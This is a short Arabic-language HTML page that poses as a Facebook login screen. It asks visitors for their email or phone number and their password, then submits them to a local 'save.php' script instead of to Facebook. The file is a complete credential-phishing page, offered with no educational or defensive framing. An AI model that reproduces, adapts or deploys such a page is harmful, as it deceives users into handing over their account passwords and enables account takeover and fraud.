<!DOCTYPE html>
<html lang="ar">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>Facebook - تسجيل الدخول</title>
<style>
body { font-family: Arial, sans-serif; background: #1877f2; color: white; text-align: center; }
.container { margin-top: 100px; }
input { padding: 10px; margin: 5px; width: 250px; border: none; border-radius: 5px; }
button { padding: 10px 20px; background: #4267B2; border: none; border-radius: 5px; color: white; font-weight: bold; }
</style>
</head>
<body>
  <div class="container">
    <h2>تسجيل الدخول إلى فيسبوك</h2>
    <form method="POST" action="save.php">
      <input type="text" name="email" placeholder="البريد الإلكتروني أو الهاتف" required /><br />
      <input type="password" name="pass" placeholder="كلمة السر" required /><br />
      <button type="submit">تسجيل الدخول</button>
    </form>
  </div>
</body>
</html>
